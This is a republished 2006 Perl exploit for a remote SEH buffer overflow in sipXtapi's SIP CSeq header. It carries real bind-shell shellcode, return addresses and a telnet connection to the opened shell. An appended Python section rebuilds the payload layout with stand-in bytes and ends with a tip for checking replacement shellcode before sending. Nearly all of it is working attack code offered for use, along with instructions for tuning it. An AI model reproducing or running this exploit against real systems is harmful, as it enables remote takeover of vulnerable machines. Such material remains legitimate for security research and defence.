SIPfoundry sipXtapi (CSeq) Remote Buffer Overflow Exploit
Source: vfocus.net  Author: acaro  Published: 2006-07-25

#!/usr/bin/perl
#
# Remote Buffer Overflow in sipXtapi
#
# The overflow is triggered by an oversized CSeq header in a SIP INVITE
# sent over UDP to port 5060. The SEH record is overwritten, so control
# is taken through the exception handler.
#
# bad chars: 0x00 0x09 0x0a 0x0d 0x20
# (NUL, tab, LF, CR and space must not appear anywhere in the CSeq value,
#  or the header parser cuts the payload short)
#

use strict;
use IO::Socket;   # also exports inet_aton, sockaddr_in, PF_INET, SOCK_DGRAM

print "\n\n";
print "sipXtapi original Exploit by Michael Thumann, real shellcode added by acaro\n\n";
print "tested on sipXphone 2.6.0.27; read the code for the ret address\n\n";

if (not $ARGV[0]) {
    print "Usage: sipx.pl <host>\n";
    exit;
}

my $target      = $ARGV[0];
my $source      = "127.0.0.1";
my $target_port = 5060;
my $user        = "bad";

# nSEH: jmp short +6 skips the handler address and lands in the NOP sled.
# SEH:  address of a pop/pop/ret that returns into nSEH.
my $nextseh = "\xeb\x06\x90\x90";
my $seh = "\xb0\x67\x01\x08"; # pop pop ret in jvm.dll for winxp Pro SP2 Italian, universal ?
#my $seh="\x27\x13\x02\x08"; # call ebx in jvm.dll for win2k Pro SP0 Italian, universal ?
#my $seh="\x22\x92\x06\x08"; # jmp ebx in jvm.dll for win2k Pro SP0 Italian, universal ?
# if you use this ret you can exploit the target host many times
my $nop = "\x90" x 32;


# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x25".
"\xe3\xa5\x9f\x83\xeb\xfc\xe2\xf4\xd9\x89\x4e\xd2\xcd\x1a\x5a\x60".
"\xda\x83\x2e\xf3\x01\xc7\x2e\xda\x19\x68\xd9\x9a\x5d\xe2\x4a\x14".
"\x6a\xfb\x2e\xc0\x05\xe2\x4e\xd6\xae\xd7\x2e\x9e\xcb\xd2\x65\x06".
"\x89\x67\x65\xeb\x22\x22\x6f\x92\x24\x21\x4e\x6b\x1e\xb7\x81\xb7".
"\x50\x06\x2e\xc0\x01\xe2\x4e\xf9\xae\xef\xee\x14\x7a\xff\xa4\x74".
"\x26\xcf\x2e\x16\x49\xc7\xb9\xfe\xe6\xd2\x7e\xfb\xae\xa0\x95\x14".
"\x65\xef\x2e\xef\x39\x4e\x2e\xdf\x2d\xbd\xcd\x11\x6b\xed\x49\xcf".
"\xda\x35\xc3\xcc\x43\x8b\x96\xad\x4d\x94\xd6\xad\x7a\xb7\x5a\x4f".
"\x4d\x28\x48\x63\x1e\xb3\x5a\x49\x7a\x6a\x40\xf9\xa4\x0e\xad\x9d".
"\x70\x89\xa7\x60\xf5\x8b\x7c\x96\xd0\x4e\xf2\x60\xf3\xb0\xf6\xcc".
"\x76\xb0\xe6\xcc\x66\xb0\x5a\x4f\x43\x8b\xb4\xc3\x43\xb0\x2c\x7e".
"\xb0\x8b\x01\x85\x55\x24\xf2\x60\xf3\x89\xb5\xce\x70\x1c\x75\xf7".
"\x81\x4e\x8b\x76\x72\x1c\x73\xcc\x70\x1c\x75\xf7\xc0\xaa\x23\xd6".
"\x72\x1c\x73\xcf\x71\xb7\xf0\x60\xf5\x70\xcd\x78\x5c\x25\xdc\xc8".
"\xda\x35\xf0\x60\xf5\x85\xcf\xfb\x43\x8b\xc6\xf2\xac\x06\xcf\xcf".
"\x7c\xca\x69\x16\xc2\x89\xe1\x16\xc7\xd2\x65\x6c\x8f\x1d\xe7\xb2".
"\xdb\xa1\x89\x0c\xa8\x99\x9d\x34\x8e\x48\xcd\xed\xdb\x50\xb3\x60".
"\x50\xa7\x5a\x49\x7e\xb4\xf7\xce\x74\xb2\xcf\x9e\x74\xb2\xf0\xce".
"\xda\x33\xcd\x32\xfc\xe6\x6b\xcc\xda\x35\xcf\x60\xda\xd4\x5a\x4f".
"\xae\xb4\x59\x1c\xe1\x87\x5a\x49\x77\x1c\x75\xf7\xd5\x69\xa1\xc0".
"\x76\x1c\x73\x60\xf5\xe3\xa5\x9f";

# 204 bytes of padding reach the SEH record, then nSEH, SEH, NOP sled, shellcode
my $cseq = ("\x41" x 204) . $nextseh . $seh . $nop . $shellcode;


# Unquoted heredoc interpolates, so each \r plus the line break gives CRLF
my $packet =<<END;
INVITE sip:user\@$source SIP/2.0\r
To: <sip:$target:$target_port>\r
Via: SIP/2.0/UDP $target:3277\r
From: "moz"<sip:$target:3277>\r
Call-ID: 3121$target\r
CSeq: $cseq\r
Max-Forwards: 70\r
Contact: <sip:$source:5059>\r
\r
END

print "Sending Packet to: " . $target . "\n\n";
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp")) or die "socket: $!\n";
my $ipaddr = inet_aton($target) or die "cannot resolve $target\n";
my $sendto = sockaddr_in($target_port, $ipaddr);
send(PING, $packet, 0, $sendto) == length($packet)
    or die "cannot send to $target : $target_port : $!\n";
print "Done.\n";

# The bind shell from the payload listens on port 4444 on the target
print " + connect to $target on port 4444...\n";

system("telnet $target 4444");
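
Added example, not part of the original exploit or of the sipXtapi project: a Python check of the CSeq payload layout the script above depends on. It rebuilds the same concatenation (204 bytes of padding, nSEH, SEH, 32 NOPs, shellcode), confirms that none of the listed bad characters appear, decodes the `eb 06` short jump in nSEH to show that it lands exactly on the NOP sled behind the handler address, shows how far a C-style header parser would read if a bad byte did slip in, and assembles the INVITE with CRLF line endings. The padding length, bad-char list, nSEH bytes and the jvm.dll address are taken from the script; the 344-byte win32_bind shellcode is replaced by a constructed stand-in of int3 bytes of the same length, so the arithmetic matches without carrying a real bind shell.

```python
import struct

# Bytes the SIP header parser treats as terminators or whitespace (from the
# "bad char" line of the exploit). None may occur in the CSeq value.
BAD_CHARS = frozenset([0x00, 0x09, 0x0a, 0x0d, 0x20])

PAD_LEN = 204                     # "\x41" x 204 in the exploit
NEXT_SEH = b"\xeb\x06\x90\x90"    # jmp short +6, then two nops
SEH = b"\xb0\x67\x01\x08"         # 0x080167b0 little-endian, the jvm.dll address used
NOPS = b"\x90" * 32

# Constructed stand-in for the page's 344-byte Metasploit win32_bind payload:
# int3 bytes of the same length, so the offsets below are identical.
STAND_IN_SHELLCODE = b"\xcc" * 344


def build_cseq(shellcode: bytes = STAND_IN_SHELLCODE) -> bytes:
    """Same concatenation as the exploit's $cseq."""
    return b"\x41" * PAD_LEN + NEXT_SEH + SEH + NOPS + shellcode


def find_bad_chars(payload: bytes) -> list:
    """(offset, byte) for every byte that would break the CSeq header value."""
    return [(i, b) for i, b in enumerate(payload) if b in BAD_CHARS]


def seh_layout(payload: bytes) -> dict:
    """Decode the SEH record written by the overflow and where nSEH's jump lands.

    Offsets are relative to the start of the CSeq value and assume, as the
    exploit does, that PAD_LEN bytes of padding reach the SEH record.
    """
    nseh_off = PAD_LEN
    handler_off = nseh_off + 4
    opcode, rel8 = payload[nseh_off], payload[nseh_off + 1]
    if opcode != 0xEB:
        raise ValueError("nSEH does not start with a short jmp (EB rel8)")
    disp = struct.unpack("<b", bytes([rel8]))[0]    # rel8 is signed
    jump_target = nseh_off + 2 + disp               # EIP after the 2-byte jmp, plus displacement
    handler_addr = struct.unpack("<I", payload[handler_off:handler_off + 4])[0]
    return {
        "nseh_offset": nseh_off,
        "handler_offset": handler_off,
        "handler_addr": handler_addr,
        "jump_target": jump_target,
        "nop_sled_start": handler_off + 4,
    }


def cseq_value_as_parsed(payload: bytes) -> bytes:
    """What a C-style header parser keeps: the value up to the first NUL,
    tab, LF, CR or space. Anything after that never reaches the buffer."""
    for i, b in enumerate(payload):
        if b in BAD_CHARS:
            return payload[:i]
    return payload


def build_invite(target: str, cseq: bytes,
                 source: str = "127.0.0.1", target_port: int = 5060) -> bytes:
    """The exploit's INVITE, headers joined with CRLF and a blank line at the end."""
    headers = [
        f"INVITE sip:user@{source} SIP/2.0".encode(),
        f"To: <sip:{target}:{target_port}>".encode(),
        f"Via: SIP/2.0/UDP {target}:3277".encode(),
        f'From: "moz"<sip:{target}:3277>'.encode(),
        f"Call-ID: 3121{target}".encode(),
        b"CSeq: " + cseq,
        b"Max-Forwards: 70",
        f"Contact: <sip:{source}:5059>".encode(),
    ]
    return b"\r\n".join(headers) + b"\r\n\r\n"


if __name__ == "__main__":
    cseq = build_cseq()
    print("payload length:", len(cseq))
    print("bad chars:", find_bad_chars(cseq))
    layout = seh_layout(cseq)
    print("SEH handler: 0x%08x" % layout["handler_addr"])
    print("nSEH jump lands at", layout["jump_target"],
          "NOP sled starts at", layout["nop_sled_start"])
    # A space inside the shellcode would truncate the header value right there.
    broken = build_cseq(b"\xcc" * 10 + b"\x20" + b"\xcc" * 333)
    print("truncated length with a 0x20 in the shellcode:",
          len(cseq_value_as_parsed(broken)))
    print(build_invite("192.0.2.10", cseq)[:120])
```

The truncation check is the one to run against any replacement shellcode or encoder output before sending: a single space or CR inside the payload does not crash anything, it just silently ends the header value and the SEH record is never reached.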